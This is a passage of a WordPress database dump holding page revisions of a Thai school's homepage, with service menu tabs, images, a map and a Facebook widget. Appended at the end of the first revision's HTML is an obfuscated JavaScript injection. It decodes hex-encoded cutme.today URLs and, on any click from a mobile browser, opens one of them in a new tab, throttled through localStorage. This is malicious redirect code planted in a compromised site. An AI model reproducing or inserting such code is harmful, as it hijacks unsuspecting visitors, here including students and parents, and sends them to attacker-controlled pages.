kadence-column14_a02c00-db\"><div class=\"kt-inside-inner-col\"><!-- wp:kadence/tabs {\"uniqueID\":\"14_8cac31-6c\",\"tabCount\":2,\"contentBgColor\":\"rgba(171,184,195,0.02)\",\"contentBorderStyles\":[{\"top\":[\"#bcbcbc\",\"\",1],\"right\":[\"#bcbcbc\",\"\",1],\"bottom\":[\"#bcbcbc\",\"\",1],\"left\":[\"#bcbcbc\",\"\",1],\"unit\":\"px\"}],\"tabAlignment\":\"center\",\"titles\":[{\"text\":\"E-SERVICE\",\"icon\":\"fe_box\",\"iconSide\":\"left\",\"onlyIcon\":false,\"subText\":\"\",\"anchor\":\"\"},{\"text\":\"เมนูระบบบริการ\",\"icon\":\"fe_airplay\",\"iconSide\":\"left\",\"onlyIcon\":false,\"subText\":\"\",\"anchor\":\"\"}],\"titleColor\":\"#000000\",\"titleColorHover\":\"#f78da7\",\"titleColorActive\":\"#ff6900\",\"titleBg\":\"var(\\u002d\\u002dglobal-palette9, #ffffff)\",\"titleBgHover\":\"#ffffff\",\"titleBgActive\":\"#ffffff\",\"titleBorder\":\"#ffffff\",\"titleBorderHover\":\"#8ed1fc\",\"titleBorderActive\":\"#8ed1fc\",\"titleBorderWidth\":[1,1,0,1],\"titleBorderRadius\":[4,4,0,0],\"titlePadding\":[8,20,8,20],\"titleMargin\":[0,8,-1,0],\"size\":\"1.299\",\"sizeType\":\"em\",\"lineHeight\":1.4,\"lineType\":\"em\",\"tabSize\":\"\",\"mobileSize\":\"\",\"fontWeight\":\"400\",\"widthType\":\"percent\",\"tabWidth\":[3,\"\",\"\"],\"gutter\":[0,\"\",\"\"]} -->\n<div class=\"wp-block-kadence-tabs alignnone\"><div class=\"kt-tabs-wrap kt-tabs-id14_8cac31-6c kt-tabs-has-2-tabs kt-active-tab-1 kt-tabs-layout-tabs kt-tabs-tablet-layout-inherit kt-tabs-mobile-layout-inherit kt-tab-alignment-center \"><ul class=\"kt-tabs-title-list kb-tabs-list-columns kb-tab-title-columns-3\"><li id=\"tab-e-service\" class=\"kt-title-item kt-title-item-1 kt-tabs-svg-show-always kt-tabs-icon-side-left kt-tab-title-active\"><a href=\"#tab-e-service\" data-tab=\"1\" class=\"kt-tab-title kt-tab-title-1 \"><span data-name=\"fe_box\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-title-text\">E-SERVICE</span></a></li><li id=\"tab-\" class=\"kt-title-item kt-title-item-2 kt-tabs-svg-show-always kt-tabs-icon-side-left kt-tab-title-inactive\"><a href=\"#tab-\" data-tab=\"2\" class=\"kt-tab-title kt-tab-title-2 \"><span data-name=\"fe_airplay\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-title-text\">เมนูระบบบริการ</span></a></li></ul><div class=\"kt-tabs-content-wrap\"><!-- wp:kadence/tab {\"uniqueID\":\"48d9e9-20\"} -->\n<div class=\"wp-block-kadence-tab kt-tab-inner-content kt-inner-tab-1 kt-inner-tab48d9e9-20\"><div class=\"kt-tab-inner-content-inner\"><!-- wp:columns -->\n<div class=\"wp-block-columns\"><!-- wp:column -->\n<div class=\"wp-block-column\"><!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":723,\"sizeSlug\":\"full\",\"linkDestination\":\"custom\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=1623\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ย้าย.png\" alt=\"\" class=\"wp-image-723\"/></a></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":1608,\"sizeSlug\":\"full\",\"linkDestination\":\"custom\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=563\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/07/comment.png\" alt=\"\" class=\"wp-image-1608\"/></a></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":1643,\"sizeSlug\":\"full\",\"linkDestination\":\"custom\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full\"><a href=\"https://script.google.com/macros/s/AKfycbycBeyhT3IIhjxxhUEISZlk1PeiQ-TJMZ0qNb8vkV8RMj-segmqLGSYF7D700852852/exec\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/07/AQ.png\" alt=\"\" class=\"wp-image-1643\"/></a></figure>\n<!-- /wp:image --></div>\n<!-- /wp:column -->\n\n<!-- wp:column -->\n<div class=\"wp-block-column\"><!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":724,\"sizeSlug\":\"full\",\"linkDestination\":\"custom\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=741\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ดูเกรด.png\" alt=\"\" class=\"wp-image-724\"/></a></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":1606,\"sizeSlug\":\"full\",\"linkDestination\":\"custom\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=484\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/07/6.png\" alt=\"\" class=\"wp-image-1606\"/></a></figure>\n<!-- /wp:image --></div>\n<!-- /wp:column -->\n\n<!-- wp:column -->\n<div class=\"wp-block-column\"><!-- wp:image {\"id\":725,\"sizeSlug\":\"full\",\"linkDestination\":\"none\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ห้องประชุม.png\" alt=\"\" class=\"wp-image-725\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":1604,\"sizeSlug\":\"full\",\"linkDestination\":\"custom\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=1611\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/07/5-1.png\" alt=\"\" class=\"wp-image-1604\"/></a></figure>\n<!-- /wp:image --></div>\n<!-- /wp:column --></div>\n<!-- /wp:columns --></div></div>\n<!-- /wp:kadence/tab -->\n\n<!-- wp:kadence/tab {\"id\":2,\"uniqueID\":\"6fe435-37\"} -->\n<div class=\"wp-block-kadence-tab kt-tab-inner-content kt-inner-tab-2 kt-inner-tab6fe435-37\"><div class=\"kt-tab-inner-content-inner\"><!-- wp:columns -->\n<div class=\"wp-block-columns\"><!-- wp:column -->\n<div class=\"wp-block-column\"><!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":726,\"sizeSlug\":\"full\",\"linkDestination\":\"custom\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full\"><a href=\"http://slp.ssk.in.th/slweb/\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/SLIP-SSK-1.webp\" alt=\"\" class=\"wp-image-726\"/></a></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":729,\"width\":\"150px\",\"sizeSlug\":\"full\",\"linkDestination\":\"custom\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full is-resized\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=748\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/2-1.png\" alt=\"\" class=\"wp-image-729\" style=\"width:150px\"/></a></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":808,\"width\":\"150px\",\"sizeSlug\":\"full\",\"linkDestination\":\"custom\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full is-resized\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=810\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/คู่มือ.png\" alt=\"\" class=\"wp-image-808\" style=\"width:150px\"/></a></figure>\n<!-- /wp:image --></div>\n<!-- /wp:column -->\n\n<!-- wp:column -->\n<div class=\"wp-block-column\"><!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":727,\"sizeSlug\":\"full\",\"linkDestination\":\"custom\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full\"><a href=\"http://pakhaeng.ssk.in.th/smss/index.php\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/smss-ssk1.webp\" alt=\"\" class=\"wp-image-727\"/></a></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":730,\"width\":\"150px\",\"sizeSlug\":\"full\",\"linkDestination\":\"none\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full is-resized\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/5.png\" alt=\"\" class=\"wp-image-730\" style=\"width:150px\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":1682,\"width\":\"150px\",\"sizeSlug\":\"full\",\"linkDestination\":\"custom\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full is-resized\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=1684\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/07/report.png\" alt=\"\" class=\"wp-image-1682\" style=\"width:150px\"/></a></figure>\n<!-- /wp:image --></div>\n<!-- /wp:column -->\n\n<!-- wp:column -->\n<div class=\"wp-block-column\"><!-- wp:image {\"id\":728,\"sizeSlug\":\"full\",\"linkDestination\":\"none\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/admss.webp\" alt=\"\" class=\"wp-image-728\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":731,\"width\":\"150px\",\"sizeSlug\":\"full\",\"linkDestination\":\"none\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full is-resized\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/6.png\" alt=\"\" class=\"wp-image-731\" style=\"width:150px\"/></figure>\n<!-- /wp:image --></div>\n<!-- /wp:column --></div>\n<!-- /wp:columns --></div></div>\n<!-- /wp:kadence/tab --></div></div></div>\n<!-- /wp:kadence/tabs -->\n\n<!-- wp:loginout /-->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"d3f1e2c8\",\"isDynamic\":true,\"blockVersion\":4} /--></div></div>\n<!-- /wp:kadence/column -->\n<!-- /wp:kadence/rowlayout -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e68763c\",\"bgImage\":{\"id\":155,\"image\":{\"url\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/rovbb.png\",\"height\":700,\"width\":2000,\"orientation\":\"landscape\"}},\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"a8863e18\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"73d9ffe7\",\"columns\":3,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"4cd8c7be\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:paragraph {\"align\":\"center\",\"backgroundColor\":\"cyan-bluish-gray\",\"fontSize\":\"medium\"} -->\n<p class=\"has-text-align-center has-cyan-bluish-gray-background-color has-background has-medium-font-size\"><strong>แผนที่/ที่ตั้ง</strong></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:html -->\n<iframe src=\"https://www.google.com/maps/embed?pb=!1m14!1m8!1m3!1d5452.291688605335!2d104.62712667989774!3d14.917446024068381!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x3116c03ca70059ff%3A0x6b24a4a42a852eab!2z4LmC4Lij4LiH4LmA4Lij4Li14Lii4LiZ4Lia4LmJ4Liy4LiZ4Lir4LiZ4Lit4LiH4Lib4Lil4Liy4LmA4LiC4LmH4LiH!5e0!3m2!1sth!2sth!4v1722057516298!5m2!1sth!2sth\" width=\"100%\" height=\"350\" style=\"border:0;\" allowfullscreen=\"\" loading=\"lazy\" referrerpolicy=\"no-referrer-when-downgrade\"></iframe>\n<!-- /wp:html -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"457aa97e\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingTop\":\"30px\",\"paddingRight\":\"30px\",\"paddingBottom\":\"0px\",\"paddingLeft\":\"30px\",\"paddingTopMobile\":\"40px\",\"paddingRightMobile\":\"15px\",\"paddingBottomMobile\":\"30px\",\"paddingLeftMobile\":\"15px\"}} -->\n<!-- wp:image {\"id\":686,\"width\":\"auto\",\"height\":\"500px\",\"aspectRatio\":\"1\",\"scale\":\"cover\",\"sizeSlug\":\"full\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-full is-resized\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/Yellow-Clean-Contact-Us-Instagram-Post.png\" alt=\"\" class=\"wp-image-686\" style=\"aspect-ratio:1;object-fit:cover;width:auto;height:500px\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"6e95d8cb\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-6e95d8cb gb-headline-text\"><strong>ติดตามเราได้ที่</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:html -->\n<iframe src=\"https://www.facebook.com/plugins/page.php?href=https%3A%2F%2Fwww.facebook.com%2F61565350226486%3Flocale%3Dth_TH&tabs=timeline&width=330&height=50&small_header=true&adapt_container_width=true&hide_cover=true&show_facepile=true&appId\" width=\"330\" height=\"80\" style=\"border:none;overflow:hidden\" scrolling=\"no\" frameborder=\"0\" allowfullscreen=\"true\" allow=\"autoplay; clipboard-write; encrypted-media; picture-in-picture; web-share\"></iframe>\n<!-- /wp:html -->\n\n<!-- wp:shortcode -->\n[post-views]\n<!-- /wp:shortcode -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"fc945863\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"width\":50,\"widthMobile\":100,\"isDynamic\":true,\"blockVersion\":4} /-->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container --></div></div>\n<!-- /wp:kadence/column -->\n<!-- /wp:kadence/rowlayout -->\n\n<p><script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script></p>','หน้าแรก','','inherit','closed','closed','','14-revision-v1','','','2025-07-16 11:15:01','2025-07-16 04:15:01','',14,'http://pakhaeng.ssk.in.th/?p=1898',0,'revision','',0),
(1900,1,'2025-07-16 13:57:42','2025-07-16 06:57:42','<!-- wp:kadence/rowlayout {\"uniqueID\":\"14_e96e1d-10\",\"columns\":1,\"colLayout\":\"equal\",\"padding\":[\"0\",\"\",\"0\",\"\"],\"displayBoxShadow\":true,\"kbVersion\":2} -->\n<!-- wp:kadence/column {\"background\":\"#ffffff\",\"borderWidth\":[\"\",\"\",\"\",\"\"],\"uniqueID\":\"14_cddd30-7b\",\"kbVersion\":2} -->\n<div class=\"wp-block-kadence-column kadence-column14_cddd30-7b\"><div class=\"kt-inside-inner-col\"><!-- wp:generateblocks/container {\"uniqueId\":\"67990d4f\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"e53f332c\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingBottom\":\"10px\"}} -->\n<!-- wp:kadence/advancedgallery {\"uniqueID\":\"14_8eda8b-3a\",\"columns\":[1,1,1,1,1,1],\"thumbSize\":\"full\",\"ids\":[666,668],\"type\":\"carousel\",\"imageRatio\":\"land169\",\"autoPlay\":true,\"transSpeed\":1000,\"slidesScroll\":\"all\",\"arrowStyle\":\"none\",\"dotStyle\":\"light\",\"imagesDynamic\":[{\"id\":666,\"link\":\"http://pakhaeng.ssk.in.th/?attachment_id=666\",\"alt\":\"\",\"url\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ปขก2-1.png\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ปขก2-1.png\",\"lightUrl\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ปขก2-1.png\",\"width\":1600,\"height\":900},{\"id\":668,\"link\":\"http://pakhaeng.ssk.in.th/?attachment_id=668\",\"alt\":\"\",\"url\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ปขก3.png\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ปขก3.png\",\"lightUrl\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ปขก3.png\",\"width\":1600,\"height\":900}],\"kbVersion\":2} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"ff644ddb\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:kadence/advancedgallery 